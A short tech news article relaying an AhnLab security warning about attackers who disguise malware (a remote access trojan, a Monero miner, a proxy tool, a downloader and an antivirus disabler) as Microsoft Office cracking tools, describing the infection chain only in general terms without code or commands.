1. Home
  2. >
  3. Industry
  4. >

Hackers Disguised as Microsoft Office Crackers to Spread Malware

By:Emma

TapTechNews May 31 news, AhnLab Security Intelligence Center today released a warning blog post, stating that there are hackers disguising themselves as Microsoft Office crackers, to distribute malicious softwares including Remote Access Trojan (RAT), cryptocurrency miners, malicious software downloaders, etc.

Hackers Disguised as Microsoft Office Crackers to Spread Malware_0

The blog post pointed out that the attacker carefully designed the interface of the Office cracking tool, and users can choose which version to install, the language and whether to use the 32-bit or 64-bit variant.

However, a obfuscated.NET malicious software will be started in the background of this cracking tool, which will access Telegram or Mastodon channels, receive a valid URL, and obtain other components from this URL.

Hackers Disguised as Microsoft Office Crackers to Spread Malware_1

The URL points to GoogleDrive or GitHub, and the base64 payload hosted on these platforms contains PowerShell commands, which can introduce a series of malicious softwares into the system after being unzipped with 7Zip.

Hackers Disguised as Microsoft Office Crackers to Spread Malware_2

According to ASEC, the malicious software on the compromised system will install various types of malicious software, and TapTechNews attached the contents as follows:

OrcusRAT: Enables full remote control, including keylogging, webcam access, screen capture and system operations to achieve data exfiltration.

XMRig: A cryptocurrency miner that uses system resources to mine Monero, and it will stop mining when the resource usage rate is high such as when the victim is playing games to avoid being detected.

3Proxy: Turns the infected system into a proxy server by opening port 3306 and injects it into legitimate processes, allowing attackers to route malicious traffic.

PureCrypter: Downloads and executes additional malicious payloads from the outside to ensure the system is continuously infected with the latest threats.

AntiAV: Disrupts and disables security software by modifying the configuration files of security software, making the software unable to function properly and making the system vulnerable to manipulation by other components.

hackers malware Microsoft Office RAT Cryptocurrency Miners

Likes